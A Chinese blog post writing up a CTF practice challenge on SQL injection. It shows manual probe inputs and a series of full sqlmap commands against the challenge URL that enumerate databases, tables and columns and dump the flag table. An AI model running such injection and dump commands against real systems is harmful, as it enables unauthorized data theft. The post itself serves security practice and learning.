CTF练习解析

实验吧web-简单的sql注入3

2019-03-25  本文已影响14人  追求科技的足球

今天的题目好难,过不了。。。只能sqlmap了。。。
1、首先测1和1’、1'and'1=1,各种正确语法都出现hello


image.png

2、然后错误数据的话就会报错。。。感觉没有约束,就是直接全过滤了,不回结果。
3、直接sqlmap吧
(1)查库

sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs

结果凉凉


image.png

(2)于是按照提示后面加入--random-agent

sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs --random-agent
image.png

还是不行。。。看来这题不简单了啊
(3)又在后面加了个后缀--keep-alive

sqlmap -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs --random-agent --keep-alive
image.png

好家伙。。不给我连了
4、好在我有win7虚拟机,在里面开了最新的sqlmap...终于成功(win中python2运行的sqlmap)
(1)查库

python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs
image.png

(2)查表

python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 --tables
image.png

(3)查字段

python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag --columns

这里有一个tips是可以设置线程数,于是后缀加了--threads 8,变得快很多

image.png
(4)查值 
python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" -D web1 -T flag -C flag --dump --threads 8
image.png

牛逼的操作等我会了再补。。。

上一篇下一篇

猜你喜欢

热点阅读